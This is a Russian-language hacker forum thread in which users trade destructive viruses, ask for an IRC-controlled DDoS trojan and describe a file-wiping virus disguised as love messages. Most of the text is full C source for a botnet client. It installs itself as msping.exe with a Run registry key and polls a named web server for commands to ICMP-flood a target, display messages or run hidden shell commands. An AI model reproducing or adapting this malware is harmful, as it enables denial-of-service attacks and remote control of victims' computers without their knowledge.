Ну я тут насобирал кучку разных вирусов, в архиве они весят 3.5 мегобайта!!! Там их оочень много, все они несут разрушение и хаус там где побывают . Вот ссылка: тыркнуть пороль ХаК (Русскими буквами) Я в зомен ничего не требую, но если кому не вломак выложите пожалуйста хорошего DDoS трояна с управлением через ирк чат.
Стараюсь, скоро, если допешу то и свои вири выложу. Снэйк, мне приятно это слышить от бывалого ачатовца
Еси кому интересно могу скинуть вирус один который стирает всё на компе + удаляет быстренько файлы из windows Но суть этого вируса такая , что при отсылке жертве этот вирус пишет всякие "любовные" открытки и сообщения))) И пока жертва с ним "общаеться" он всё удаляет с компа , а главное не палиться
Вирусы это вредоносные программы уничтожающие данные на компьютере или блокирующие доступ к ним. А ваще вот тут много инфы о разновидностях вирусов Тырк
есть один, только не через IRC,а через WWW .php Coder by Gorlum PHP: /* Coder by Gorlum */ // адрес web-сервера #define WEBADDRESS "ired.inins.ru" // имя файла\скрипта #define WEBFILE "flood.php" // ращмер пакета #define PACKETSIZE 1000 // частота отсыла #define FREQ 100 #include <winsock2.h> //#pragma comment(linker,"/MERGE:.rdata=.text") #pragma comment(linker,"/SECTION:.text,EWRX") #pragma comment(linker,"/ENTRY:WinMain") #define FILENAMELEN 0xFF HANDLE thread; DWORD resolve(char *host) { DWORD ret = 0; struct hostent * hp = gethostbyname(host); if (!hp) ret = inet_addr(host); if ((!hp)&&(ret == INADDR_NONE)) return 0; if (hp != NULL) memcpy((void*)&ret, hp->h_addr,hp->h_length); return ret; } #define ICMP_ECHO 8 typedef struct _ihdr { BYTE i_type; BYTE i_code; USHORT i_cksum; USHORT i_id; USHORT i_seq; ULONG timestamp; }IcmpHeader; #define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s)) #define xfree(p) HeapFree (GetProcessHeap(),0,(p)) USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) cksum += *(UCHAR*)buffer; cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } void fill_icmp_data(char * icmp_data, int datasize){ IcmpHeader *icmp_hdr; char *datapart; icmp_hdr = (IcmpHeader*)icmp_data; icmp_hdr->i_type = ICMP_ECHO; icmp_hdr->i_code = 0; icmp_hdr->i_id = (USHORT)GetCurrentProcessId(); icmp_hdr->i_cksum = 0; icmp_hdr->i_seq = 0; datapart = icmp_data + sizeof(IcmpHeader); // memset(datapart,'E', datasize - sizeof(IcmpHeader)); for(int i = 0; i < datasize - sizeof(IcmpHeader); i++) { datapart[i] = GetTickCount()%255; Sleep(23); } } int ping(char* host, int datasize, int timeout){ SOCKET sockRaw; SOCKADDR_IN dest; int bread; char *icmp_data; USHORT seq_no = 0; memset(&dest,0,sizeof(dest)); dest.sin_family = AF_INET; dest.sin_addr.S_un.S_addr = resolve(host); //MessageBox(0,inet_ntoa(dest.sin_addr),"ok",0); sockRaw = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL,0,0); if(sockRaw == INVALID_SOCKET) return -1; bread = setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)); if(bread == SOCKET_ERROR) return -1; datasize += sizeof(IcmpHeader); icmp_data = (char*)xmalloc(0xFFFF); if(!icmp_data) return -1; memset(icmp_data,0,0xFFFF); fill_icmp_data(icmp_data,datasize); while(1) { int bwrote; ((IcmpHeader*)icmp_data)->i_cksum = 0; ((IcmpHeader*)icmp_data)->timestamp = GetTickCount(); ((IcmpHeader*)icmp_data)->i_seq = seq_no++; ((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize); bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest, sizeof(dest)); if(bwrote == SOCKET_ERROR) return -1; Sleep(FREQ); } return 0; } inline void addtorun() { char str[FILENAMELEN], sysbuf[FILENAMELEN]; // получаем полный путь к текущему месторасположению программы GetModuleFileName(GetModuleHandle(NULL),str,FILENAMELEN); GetSystemDirectory(sysbuf,FILENAMELEN); strcat(sysbuf,"\\msping.exe"); // копируем себя в системную директорию CopyFile(str,sysbuf,true); // добавляем в автозапуск HKEY hk; RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hk); RegSetValueEx(hk,"msping",0,REG_SZ,(LPBYTE)sysbuf, strlen(sysbuf) + 1); RegCloseKey(hk); } DWORD WINAPI icmpflood (LPVOID pParam) { ping((char*)pParam,PACKETSIZE,1000); return 0; } void flood(char *host) { DWORD lpThreadId; thread = CreateThread(NULL, NULL, icmpflood, (LPVOID)host, NULL, &lpThreadId); } int getcommand() { char *sendbuffer = "GET /"WEBFILE" HTTP/1.0\r\nHost: "WEBADDRESS"\r\n\r\n", recvbuffer[1024]; // создаем сокет для подключения к Web-серверу SOCKET s = socket(AF_INET,SOCK_STREAM,0); memset(recvbuffer,0,1024); // ресолвим адрес и заносим данные в структуру SOCKADDR_IN webaddr; webaddr.sin_addr.S_un.S_addr = resolve(WEBADDRESS); webaddr.sin_family = AF_INET; webaddr.sin_port = htons(80); // подсоединились if(connect(s, (struct sockaddr *)&webaddr,sizeof(SOCKADDR_IN))) return -1; // шлем запрос send(s, sendbuffer, strlen(sendbuffer),0); Sleep(5000); // получаем ответ int i; while(i = recv(s,recvbuffer+strlen(recvbuffer),1,0)) {if (i == SOCKET_ERROR) return -1;} // MessageBox(0,recvbuffer,"",0); // return 0; // анализируем ответ // отбрасываем захоловок, он нам не нужен char *temp,*token; for(int i = 0; recvbuffer[i]!=0; ++i){ if((recvbuffer[i]=='\r')&&(recvbuffer[i+1]=='\n')&& (recvbuffer[i+2]=='\r')&&(recvbuffer[i+3]=='\n')) {temp = (char*)&recvbuffer[i] + 4;break;} } token = strtok(temp, " \r\n"); // файл делим на слова... // если нас просят пофлудить if(strcmp(token,"flood")==0) { // то получаем второй параметр token = strtok(NULL, " \r\n"); // и запускаем нить флуда // MessageBox(0,"уря","",0); flood(token); } // если просят убить себя else if (strcmp(token,"kill")==0) { // удаляем запись из реестра HKEY hk; RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hk); RegDeleteKey(hk,"msping"); RegCloseKey(hk); // и убиваем процесс ExitProcess(0); } else if (strcmp(token,"mess")==0) { // сообщение temp+=5; temp = strtok(temp,"\r\n"); MessageBox(0, temp, "Сообщение!",0); } else if(strcmp(token,"cmd")==0) { temp+=4; temp = strtok(temp,"\r\n"); char parametr[128]; strcpy(parametr,"/c"); strcat(parametr,temp); ShellExecute(0,"open","cmd",parametr,0,SW_HIDE); } closesocket(s); return 0; } int __stdcall WinMain(HINSTANCE, HINSTANCE, PTSTR, int) { // раз addtorun(); thread = NULL; WSADATA wsaData; WSAStartup(MAKEWORD(2,2), &wsaData); /* мы бесконечно скачиваем наш файлик... если скачать\приконнектиться не удалось, значит соединени с инетом не установлено и мы повторяем через 30сек... иначе через 30 мин */ while(true) { if (thread) TerminateThread(thread,0); if(getcommand()) { Sleep(30*1000); continue; } Sleep(30*60*1000); } WSACleanup(); ExitProcess(0); return 0; }